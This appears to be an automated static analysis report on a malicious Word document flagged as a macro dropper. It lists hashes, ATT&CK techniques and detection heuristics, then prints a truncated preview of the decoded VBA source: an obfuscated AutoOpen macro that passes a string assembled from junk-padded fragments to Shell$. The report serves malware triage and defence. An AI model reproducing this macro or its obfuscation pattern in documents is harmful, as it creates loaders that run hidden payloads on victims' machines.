Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f8d9ffc5ec38f6f0…

MALICIOUS

Office (OLE)

216.0 KB Created: 2017-11-22 18:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: 333af5096e827098fbb4fcefd21bc00a SHA-1: e1aecc53e821a1ddb686a2c58bed80d44add6f0a SHA-256: f8d9ffc5ec38f6f0f367fcc41184d32ab4b5e8a988958b38c9197ceb1b5a4f6e
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro uses a Shell() call to execute code, indicating it's designed to download and run a secondary payload. The presence of a legacy WordBasic auto-exec marker and the ClamAV detection further support its malicious nature.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6381045-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6381045-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 273775 bytes
SHA-256: 6591886ca2aef909ac898a3cf388a72702ca119c202db6c40632e915ee84e336
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 104 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KfsUkXdVQ"
Sub AutoOpen()

uMPBwjXXw = Array("bFOfKMfO", "jWLDwfmw", "XZQwjXpO", "HsPrMbrj", "NnMnszif", "jctdwrwj", "dCbHHaNE", "PzYRwoBH")
icqJTzGau = Array("kNHiMRPu", "iNJAkcma", "HXsZNiua", "mwUBoMiw", "BMXMFaDi", "IWOarGuA", "DiLbOAhB", "TjrNzOFV")
jNzYFZUhT = Array("KQqUTjfE", "UzFACiAi", "VtZiqkuR", "srdGVviO", "iIDjrjzw", "MJcQzVjf", "ztjfuzdZ", "WYccFYiZ")
Shell$ srcFRSfMG, 0
TrWuiQnpu = Array("cVhIdRXL", "wHcLwUff", "iMSEXrna", "DwIwmBiG", "ukRdvRsH", "EQHRGNVW", "rOzEVkXl", "iGEhJYZw")
YVRNCBjMT = Array("LzGjVTqb", "lHXBikJN", "fvoNLzfr", "KtkvHUpi", "mkJlRBMn", "NFYRButk", "IAWGuzHN", "TOYciuTR")
RsOubYwii = Array("BzGZOqQz", "znHzjknc", "vRCdjETm", "GAIjzJjD", "sXtABoFY", "IdiHLThI", "bSfHuAww", "fTSNhjzq")
End Sub
Function srcFRSfMG()
qDQHpBj = "ikDPXHGSbtMhHVzAFptGLfibzdSiwnrRBFKUFJuZEcJlJpQXzlpBjKaNwGAZGNWoBvfBKfuwvTBjVzSINCo94Y1Zc43oS4C"
bJCWkTK = Array("PUvijPNR", "kPTQoMhi", "AfsHbtFK", "GXQYBEEv", "EUzwSBnF", "tVzcviCD", "zTGzDMhW", "OkXJwoPf")
Pjizp = Mid(qDQHpBj, 8, 74)
zkTvHhJkpfi = Array("JqfzmcIi", "XrQUfuvR", "UwwKoSaz", "vjzMOObw", "ZBNjECLh", "qYdNSNjU", "UHmirOuq", "QfBGcvTJ")
iwblmbScQwR = "PzhGbbCAphjzjYZRqDwGlNOflNVwGTpHPHCBiBfJnfjh82wqb1uTjAm6iCkPmGYcrKXNn91w1PoTmw"
jFHKFO = Array("zKCIsAkH", "UjwnHqVt", "LlXdQLwD", "TXbzzjad", "NrDrouMa", "mcjmnlEa", "HBkRlKFm", "LwpUZnIn")
LsZrEJt = Mid(iwblmbScQwR, 2, 42)
jMMcoOIw = Array("jHAfKsIn", "XMfqAbsL", "CwMjoUrX", "kOqzzBOU", "osjraucd", "mBNBCqDF", "bWkDWkZL", "QdvvCJnW")
CFWwzhWs = "WWi3NGbwHUNuiXBWrAIvGfOwOrnkuNiNrmcuEjIqkWSuwhVqCcHjIYzDDkYNjaWvbADsvGRIsRLjNUCjWziSFL0fkIniq2n38c9ACiFi84BibEVc"
UXtQR = Array("jTVDKKXc", "OVLSRRzq", "wTFEBPat", "XYjnARiG", "HPDpsiOa", "knCmDXCZ", "KmCkZMuR", "tcflbjbz")
PkGhWcZhinD = Mid(CFWwzhWs, 11, 75)
cSdkDVKXT = Array("vsTjhvVd", "NMBdQDlU", "GjHzqcBJ", "EjsqMRfh", "HNsazdSm", "mYLkJOhY", "kIPQHOpT", "qKcADfRw")
MUdOPi = "2FYLmsBhHPQWtkKKbUIKfrYOjhkVHUrzDKNJkJJWWrZXKJhLAPQQrLqaqFcFIjamXTSiXBaSKlnnRAEZzYUrEbFrTmSijDOqRmArrwowozGFYDIqADFjLiiwNbOkjvlGWwWfANiBkVCGUzTQibidwfiiDDdPjDPtMzjbjdqnVEzqfbbNHzCT0nfa"
zdCvr = Array("qQQQYYKk", "ZjdTNSJT", "rrfaqQGP", "mOFYLpiw", "qHnYmELr", "iKzSVwmE", "vSkYMcVa", "KBdKTmYk")
FKbwoKORwH = Mid(MUdOPi, 4, 174)
qhnIJ = Array("jRCHoroW", "zcYfSmAo", "hqiUMhvz", "WMbvTkmI", "OCNbdwRu", "qtUdoCUk", "PsuWCzPz", "WFlcPsCM")
QljsOjWd = "HRifLRYkw3qMkOFoJCisCHdukXYDTAEaHpkEHHDZEjwOs"
woqZhdi = Array("iUTzHoCE", "uWXjOshH", "cRPnvGTO", "BwcDdjzv", "CXODGmXw", "WHlwAjvS", "IQjoEwXX", "AEzKLwbK")
ulYsMwjzKS = Mid(QljsOjWd, 11, 29)
ljwvOOz = Array("QwvFaDXv", "bRIFNOcw", "FqcnSFlF", "hOwCLHno", "mOHotBwF", "QmqsXZlf", "nYLjUYMK", "LqYMGUkT")
MaGcjb = "5X2GMlBFDFpaNzffhPAszadzkcvDlAdjiabYuiidVOaiqkWtwCSQRSBUuFJuUfjdsOcnVGlwlXWjzwJzGBFjhMOPZHioZjHnsvEHm4qhBbPdUrS00"
WlNpCRc = Array("LiQCvoph", "mIGqFiwN", "QHimBzdD", "kOKldDBQ", "dJdolulK", "kRRfhmow", "rQRtLwUL", "ANRjdEEj")
bcoroz = Mid(MaGcjb, 13, 82)
uKOcLJbhJ = Array("itHuuoTw", "WPvHPDZQ", "oXKNDkTR", "QNodNADR", "rNIlbHkC", "HMfoSCzh", "wawEnnct", "aqihAqjW")
lrbhlDFlP = "iOPtdtSvMVGjwSOwCHmGTIjZhAshSomTIcnjFrGlMWjvjWiIDzaQQzKUocPwjGzFAhaWiiqLBAuwblqKWjiVNWDLRTudbJntwWSwkWoTK9uE"
oXOqEL = Array("BmmcGNsK", "JRTaVWBf", "JjuhTZNY", "pmXKQatH", "ZswhTnRi", "KkcGMrwi", "AismpQlc", "YOmUqhti")
BShBjwsDrvt = Mid(lrbhlDFlP, 12, 83)
QFPEwQMuc = Array("mWXzadai", "RMXqjMlE", "olfLwSVV", "lYHqkNKl", "EHGYMicO", "rYzwUGPY", "vCulXjST", "BBNBVkwE")
zjicdjLQit = "83bwKjwXMkPEXzXiDzPJi8Lw3b2mkzfQcBsEiDAlvjrdhAjSKwuXFtXPjUdVvKmirG"
UKzNiAbolPz = Array("FwIljPvL", "BNaDmMfB", "lzYlhGMr", "wjMvSkii", "vSoCitZM", "TGPqjzma", "jIWHhjIw", "kRpwCAsQ")
XkGFpCS = Mid(zjicdjLQit, 33, 30)
kiWhsTpc = Array("UtsCYMFS", "odMKlpPF", "osDKRuGi", "sREAAwXP", "BzIAJdrp", "jNItzqfF", "bPRQDKDZ", "nOKHHFRq")
mSwIF
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.